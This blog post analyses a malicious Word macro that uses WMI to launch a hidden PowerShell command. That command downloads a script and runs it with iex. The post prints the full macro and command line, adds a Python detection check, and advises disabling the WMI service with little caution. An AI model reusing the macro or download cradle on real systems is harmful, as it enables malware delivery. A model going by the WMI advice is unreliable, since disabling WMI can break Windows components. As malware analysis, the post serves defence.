Fileless malware and WMI

Hello and welcome back. After a few weeks I managed to find time and write a new blog post. Someone suggested an article about fileless malware and here it is.

The thing with fileless malware is that it runs completely in memory (if the name wasn’t obvious enough), so it can evade security software that inspects disk writes, and forensic evidence must be gathered from memory (or the Windows registry).

Since persistence is an important aspect of malware, this kind of threat usually ensures it by writing an autorun registry key with a command that spawns a script using PowerShell, wscript or even mshta (but that will be a topic for another day).

The infection vector can be any document or even a web page with malicious JavaScript, but the main functionality runs in memory. Today’s example is a Word document:

  • b69256cf0660688bcbb808e90cb957a47bf9033706dc27828fe83b03140ba3bb

[Screenshot: the Office document]

Typical social engineering for malicious documents: fooling the trusting user into enabling macros even though the Enable button sits right under a “SECURITY WARNING”.

To view the macro script, press ALT+F11 or find the View tab -> Macros -> View Macros menu.

Sub AutoOpen()
    ' Runs automatically when the document is opened and macros are enabled
    Const HIDDEN_WINDOW = 0
    strComputer = "."            ' "." = the local machine
    x1 = "Download"              ' concatenated later, so the literal "DownloadString"
    x2 = "String"                ' never appears in the macro text for keyword scanners
    ' Connect to the local WMI service (root\cimv2 namespace)
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

    ' Build a Win32_ProcessStartup configuration that hides the new process window
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    ' Win32_Process.Create launches the process through WMI, so its parent is the
    ' WMI provider host rather than Word (the URLs were empty in this sample)
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create "power" & "shell" & ".exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient)." & x1 & x2 & "('') | iex } else {(new-object Net.WebClient)." & x1 & x2 & "('') | iex}", Null, objConfig, intProcessID
End Sub

If you read the macro code closely, you’ll see an object is created from “winmgmts”, which is the WMI service within Windows. WMI stands for “Windows Management Instrumentation”; it’s a technology that allows automation of tasks and management of objects within the OS. According to Microsoft, WMI was implemented in Windows 95 and NT 4.0, so it’s pretty darn old. This technology is fairly popular among network admins, but in recent years it has “won the heart” of malware developers.

After creating that object, it continues by calling the APIs responsible for creating a new process with a hidden window (“Win32_ProcessStartup”, “SpawnInstance_”) and then passes a PowerShell command line as the argument to the final “Create” method.


powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('') | iex } else {(new-object Net.WebClient).DownloadString('') | iex}

The PowerShell script is pretty obvious: it downloads another PS script and executes it with IEX (Invoke-Expression). At the time of writing this post, those links point to nothing, but we could have found anything imaginable in them (from Mimikatz to bankers, reverse shells, and maybe even code injection into other processes).

Running the macro and viewing the havoc in Process Monitor, we’ll see a new PowerShell process spawned not under MS Word, but under “svchost.exe -> WmiPrvSE.exe”.

[Screenshot: Process Monitor tree view of processes]
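As an added detection example (mine, not code from the original post): a small Python check that applies the two observations above, a PowerShell child of WmiPrvSE.exe plus the switches and download cradle visible in the decoded command line, to process-creation records. The record fields and both sample events are constructed to resemble Sysmon-style telemetry and are not taken from the post.

```python
import re
from dataclasses import dataclass

# Command-line indicators taken from the decoded PowerShell command line in the post.
CMDLINE_INDICATORS = {
    "execution_policy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}

@dataclass
class ProcEvent:
    """One process-creation record (field names modelled on Sysmon Event ID 1; assumption)."""
    image: str
    parent_image: str
    command_line: str

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze(ev: ProcEvent) -> dict:
    """Return matched indicators; a lone WMI parent is not enough, since admins use WMI legitimately."""
    hits = [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(ev.command_line)]
    if basename(ev.image) in ("powershell.exe", "pwsh.exe") and basename(ev.parent_image) == "wmiprvse.exe":
        hits.insert(0, "powershell_spawned_by_wmiprvse")
    return {"hits": hits, "suspicious": len(hits) >= 2}

# Constructed sample events, not real telemetry: the first mirrors the macro's command line,
# the second is a benign WMI-launched admin script.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        command_line="powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit "
                     "-c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('') | iex } "
                     "else {(new-object Net.WebClient).DownloadString('') | iex}",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        command_line=r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
    ),
]

def scan(events=SAMPLE_EVENTS) -> list:
    """Analyze every event; returns one result dict per event, in order."""
    return [analyze(e) for e in events]
```

Calling scan() flags only the first event; the WMI parent alone counts as a single hit, so legitimate admin scripts launched through WMI do not trip the check.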

This is a simple yet efficient technique to install malware on an unsuspecting user’s machine, but it can easily be prevented. If you didn’t know what WMI is, I bet you don’t even need it, so why not disable it from the Windows Services?

I’m not aware of any issues in the OS if WMI is disabled, so let’s do it.


Now, after WMI is disabled, running the macro from that Word document throws an error and the infection fails.

[Screenshot: macro error]

For the next post I’ll try to find a more interesting sample, with persistence and maybe even a JS from a web page.

C yea!
